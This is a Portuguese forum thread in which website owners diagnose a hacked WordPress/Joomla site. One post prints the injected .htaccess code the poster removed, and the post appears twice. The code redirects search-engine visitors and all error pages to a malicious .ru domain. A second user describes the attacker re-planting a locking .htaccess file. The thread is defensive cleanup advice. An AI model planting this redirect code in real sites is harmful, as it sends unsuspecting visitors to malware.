- Postagens: 1
- Obrigados Recebidos: 0
Vírus????
- Mandruvah
-
- Offline
- JCB! Novato
-
Menos
Mais
13 anos 7 meses atrás #64314
por Mandruvah
Mandruvah replied the topic: Re: Vírus????
Tive o mesmo problema com
http://daliachuqimaysa.ru/gluce/index.php
- Veja a solução abaixo:
Ocorria o seguinte:
1 - Quando eu entrava digitando o meu site (wordpress) no nabegador, ele entrava. Mas quando eu acessava meu site pelas buscas do Google, Yahoo, etc..., ele travava no link http://daliachuqimaysa.ru/gluce/index.php
2 - Daí o navegador pegava e gravava este link (Cache), e não dava mais para entrar diretamente pelo navegador. Só conseguia entrar novamente quando eu limpava os dados pessoais/cache. Mas o problema continuava nos sites de busca.
3 - O PROBLEMA ESTAVA NO ARQUIVO .HTACCESS
>>>>>>>>>>>>>>>>>>>>>>>>SOLUÇÃO<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
Trata-se de um Trojan de origem de um servidor Russo, que explora as vulnerabilidades do .htaccess do Wordpress e Joomla. Basta apagar o código malicioso para resolver.
[color=#0040BF:3mggo8dv]>>>>>>>>>>>>>>>>>>>>>>>COMO REMOVER<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[/color:3mggo8dv]
Eu baixei um plugin do Wordpress chamado "Htaccess Editor". Após acessar o editor, verifiquei claramente o código malicioso que lá estava implantado. Apenas deletei o código e o site voltou ao normal instataneamente.
>>>>>>>>>>>>>>>>>>>SEGUE ABAIXO O CÓDIGO QUE EU REMOVI<<<<<<<<<<<<<<<<<<<<
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
</IfModule>
ErrorDocument 400 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 401 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 403 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 404 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 500 http://daliachuqimaysa.ru/gluce/index.php
================================================================================= >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Percebam que o código explora os buscadores da internet (google, yahoo, etc...) justamente aonde estava dando defeito.
[color=#0000FF:3mggo8dv]PARA ME PROTEGER, BAIXEI O PLUGIN "BulletProof Security" QUE RESOLVEU AS FALHAS DO WORDPRESS. NO JOOMLA PROCUREM POR UM PLUGIN PARECIDO OU QUE BLOQUEIEM O ACESSO AO .HTACCSESS[/color:3mggo8dv]
Meu site <!-- w -->[url=http://www.neurologistadf.com" onclick="window.open(this.href);return false;]www.neurologistadf.com[/url]<!-- w --> segue com saúde e seguro agora.
Ocorria o seguinte:
1 - Quando eu entrava digitando o meu site (wordpress) no nabegador, ele entrava. Mas quando eu acessava meu site pelas buscas do Google, Yahoo, etc..., ele travava no link http://daliachuqimaysa.ru/gluce/index.php
2 - Daí o navegador pegava e gravava este link (Cache), e não dava mais para entrar diretamente pelo navegador. Só conseguia entrar novamente quando eu limpava os dados pessoais/cache. Mas o problema continuava nos sites de busca.
3 - O PROBLEMA ESTAVA NO ARQUIVO .HTACCESS
>>>>>>>>>>>>>>>>>>>>>>>>SOLUÇÃO<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
Trata-se de um Trojan de origem de um servidor Russo, que explora as vulnerabilidades do .htaccess do Wordpress e Joomla. Basta apagar o código malicioso para resolver.
[color=#0040BF:3mggo8dv]>>>>>>>>>>>>>>>>>>>>>>>COMO REMOVER<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[/color:3mggo8dv]
Eu baixei um plugin do Wordpress chamado "Htaccess Editor". Após acessar o editor, verifiquei claramente o código malicioso que lá estava implantado. Apenas deletei o código e o site voltou ao normal instataneamente.
>>>>>>>>>>>>>>>>>>>SEGUE ABAIXO O CÓDIGO QUE EU REMOVI<<<<<<<<<<<<<<<<<<<<
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
</IfModule>
ErrorDocument 400 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 401 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 403 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 404 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 500 http://daliachuqimaysa.ru/gluce/index.php
================================================================================= >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Percebam que o código explora os buscadores da internet (google, yahoo, etc...) justamente aonde estava dando defeito.
[color=#0000FF:3mggo8dv]PARA ME PROTEGER, BAIXEI O PLUGIN "BulletProof Security" QUE RESOLVEU AS FALHAS DO WORDPRESS. NO JOOMLA PROCUREM POR UM PLUGIN PARECIDO OU QUE BLOQUEIEM O ACESSO AO .HTACCSESS[/color:3mggo8dv]
Meu site <!-- w -->[url=http://www.neurologistadf.com" onclick="window.open(this.href);return false;]www.neurologistadf.com[/url]<!-- w --> segue com saúde e seguro agora.
Please Entrar ou Registrar to join the conversation.
- mtaborda
-
Autor do Tópico
- Offline
- JCB! Novato
-
Menos
Mais
- Postagens: 3
- Obrigados Recebidos: 0
13 anos 7 meses atrás #64320
por mtaborda
mtaborda replied the topic: Re: Vírus????
O problema não é tão simples quanto parece. Eu consegui deletar o htacess e reescrever, mas o hacker criou outro, ou seja, tem alguma porta aberta.
Ele colocou a seguinte mensagem no htacess novo
"deny from all
AllowOverride None
Note: this file is broken intentionally, we do not want anybody to undo it in subdirectory!"
Com isso, não acesso por ftp e o painel da locaweb está insuportavelmente lento!
Vou fazer a restauração de um backup antigo, mas a porta continuará aberta.
Hj o redirecionaram agora para congatarc-lyauli.ru
Alguma sugestão de por onde começar a caça?
Ele colocou a seguinte mensagem no htacess novo
"deny from all
AllowOverride None
Note: this file is broken intentionally, we do not want anybody to undo it in subdirectory!"
Com isso, não acesso por ftp e o painel da locaweb está insuportavelmente lento!
Vou fazer a restauração de um backup antigo, mas a porta continuará aberta.
Hj o redirecionaram agora para congatarc-lyauli.ru
Alguma sugestão de por onde começar a caça?
Please Entrar ou Registrar to join the conversation.